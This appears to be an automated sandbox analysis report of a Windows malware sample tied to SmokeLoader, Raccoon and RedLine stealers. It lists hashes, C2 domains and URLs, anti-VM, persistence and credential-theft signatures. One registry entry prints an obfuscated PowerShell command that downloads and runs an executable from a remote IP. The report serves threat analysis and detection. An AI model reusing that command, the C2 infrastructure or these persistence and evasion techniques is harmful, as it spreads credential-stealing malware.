Analysis
-
max time kernel
143s -
max time network
157s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
11-08-2021 20:01
Static task
static1
Behavioral task
behavioral1
Sample
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Resource
win10v20210410
General
-
Target
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
-
Size
207KB
-
MD5
4a24658b8b28d1512378d374676846dc
-
SHA1
1d326b774e7f11bcaffbdb4198db8cc47735e808
-
SHA256
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a70270e30e666c9baa7d
-
SHA512
c762af1ea682cfa41bdb211a74cce91600da32ccace258e6dd0b2ed9eb02bad2d01922ef9ccc00a6b1c909d8fe7e3955ded408a0f643da75fcfbb805de4b6d3c
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
-
url4cnc
https://telete.in/johnyes13
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4792 1116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4300 1116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4388 1116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4728 1116 schtasks.exe -
Raccoon Stealer Payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3612-200-0x0000000000400000-0x0000000002CB1000-memory.dmp family_raccoon behavioral2/memory/3612-203-0x0000000004810000-0x00000000048A3000-memory.dmp family_raccoon behavioral2/memory/3872-204-0x0000000000400000-0x0000000002CB0000-memory.dmp family_raccoon behavioral2/memory/3872-206-0x0000000004940000-0x00000000049D1000-memory.dmp family_raccoon behavioral2/memory/4448-285-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/4448-289-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BD9B.exe family_redline C:\Users\Admin\AppData\Local\Temp\BD9B.exe family_redline C:\Users\Admin\AppData\Local\Temp\CF70.exe family_redline C:\Users\Admin\AppData\Local\Temp\CF70.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 3380 created 3612 3380 WerFault.exe D25F.exe PID 900 created 3872 900 WerFault.exe D399.exe -
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 40 4256 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 55 IoCs
Processes:
AEE3.exeB472.exeB472.tmpB472.exeB472.tmpBD9B.exeC1B3.exefsucenter.exeC628.exeCF70.exeRuntimebroker.exeD25F.exeD399.exeC628.execheat.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeDatabase.exeDatabase.exesmss.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exefajaeitDatabase.exeDatabase.exeDatabase.exepid process 2620 AEE3.exe 3524 B472.exe 1116 B472.tmp 4044 B472.exe 1572 B472.tmp 3880 BD9B.exe 2928 C1B3.exe 4020 fsucenter.exe 2624 C628.exe 3376 CF70.exe 1112 Runtimebroker.exe 3612 D25F.exe 3872 D399.exe 4448 C628.exe 4516 cheat.exe 4224 Database.exe 2596 Database.exe 2268 Database.exe 2616 install.exe 4408 HostData.exe 4428 Database.exe 2608 Database.exe 800 Database.exe 4764 Database.exe 4656 Database.exe 4776 Database.exe 4820 Database.exe 2964 Database.exe 580 Database.exe 4972 Database.exe 5012 Database.exe 5048 Database.exe 192 Database.exe 4976 Database.exe 4284 Database.exe 4240 Database.exe 3760 Database.exe 4360 Database.exe 2268 Database.exe 4432 Database.exe 2308 Database.exe 3164 Database.exe 3944 Database.exe 4500 install.exe 800 Database.exe 4412 Database.exe 4720 smss.exe 4384 Database.exe 2620 Database.exe 2964 Database.exe 1316 Database.exe 4924 fajaeit 580 Database.exe 4172 Database.exe 5004 Database.exe -
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeBD9B.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeCF70.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BD9B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BD9B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CF70.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CF70.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe -
Deletes itself 1 IoCs
Processes:
pid process 2680 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 1 IoCs
Processes:
fsucenter.exepid process 4020 fsucenter.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BD9B.exe themida C:\Users\Admin\AppData\Local\Temp\BD9B.exe themida behavioral2/memory/3880-147-0x0000000000F00000-0x0000000000F01000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\CF70.exe themida C:\Users\Admin\AppData\Local\Temp\CF70.exe themida behavioral2/memory/3376-184-0x0000000000240000-0x0000000000241000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
install.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\\explorer.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\ProgramData\\Desktop\\Idle.exe\"" install.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\dhcpcmonitor\\dllhost.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\All Users\\Mozilla\\updates\\308046B0AF4A39CB\\smss.exe\"" install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeBD9B.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeCF70.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BD9B.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CF70.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\SysWOW64\dhcpcmonitor\dllhost.exe install.exe File opened for modification C:\Windows\SysWOW64\dhcpcmonitor\dllhost.exe install.exe File created C:\Windows\SysWOW64\dhcpcmonitor\5940a34987c99120d96dace90a3f93f329dcad63 install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
BD9B.exeCF70.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 3880 BD9B.exe 3376 CF70.exe 4224 Database.exe 4224 Database.exe 4224 Database.exe 2596 Database.exe 2596 Database.exe 2596 Database.exe 2268 Database.exe 2268 Database.exe 2268 Database.exe 4428 Database.exe 4428 Database.exe 4428 Database.exe 2608 Database.exe 2608 Database.exe 2608 Database.exe 800 Database.exe 800 Database.exe 800 Database.exe 4764 Database.exe 4764 Database.exe 4764 Database.exe 4656 Database.exe 4656 Database.exe 4656 Database.exe 4776 Database.exe 4776 Database.exe 4776 Database.exe 4820 Database.exe 4820 Database.exe 4820 Database.exe 2964 Database.exe 2964 Database.exe 2964 Database.exe 580 Database.exe 580 Database.exe 580 Database.exe 4972 Database.exe 4972 Database.exe 4972 Database.exe 5012 Database.exe 5012 Database.exe 5012 Database.exe 5048 Database.exe 5048 Database.exe 5048 Database.exe 192 Database.exe 192 Database.exe 192 Database.exe 4976 Database.exe 4976 Database.exe 4976 Database.exe 4284 Database.exe 4284 Database.exe 4284 Database.exe 4240 Database.exe 4240 Database.exe 4240 Database.exe 3760 Database.exe 3760 Database.exe 3760 Database.exe 4360 Database.exe 4360 Database.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exeC628.exeinstall.exedescription pid process target process PID 1852 set thread context of 2256 1852 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 2624 set thread context of 4448 2624 C628.exe C628.exe PID 2616 set thread context of 4500 2616 install.exe install.exe -
Drops file in Program Files directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\explorer.exe install.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3816 2928 WerFault.exe C1B3.exe 3336 2928 WerFault.exe C1B3.exe 808 2928 WerFault.exe C1B3.exe 4016 2928 WerFault.exe C1B3.exe 2620 2928 WerFault.exe C1B3.exe 3708 2928 WerFault.exe C1B3.exe 808 3612 WerFault.exe D25F.exe 3176 1112 WerFault.exe Runtimebroker.exe 1264 3872 WerFault.exe D399.exe 3000 1112 WerFault.exe Runtimebroker.exe 3552 3612 WerFault.exe D25F.exe 1000 3872 WerFault.exe D399.exe 1016 1112 WerFault.exe Runtimebroker.exe 800 3612 WerFault.exe D25F.exe 1760 3872 WerFault.exe D399.exe 1744 1112 WerFault.exe Runtimebroker.exe 2620 3612 WerFault.exe D25F.exe 2596 3872 WerFault.exe D399.exe 3380 3612 WerFault.exe D25F.exe 900 3872 WerFault.exe D399.exe 2632 1112 WerFault.exe Runtimebroker.exe 3076 1112 WerFault.exe Runtimebroker.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4728 schtasks.exe 4792 schtasks.exe 4300 schtasks.exe 4388 schtasks.exe -
Modifies registry class 2 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance -
Processes:
fsucenter.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 fsucenter.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2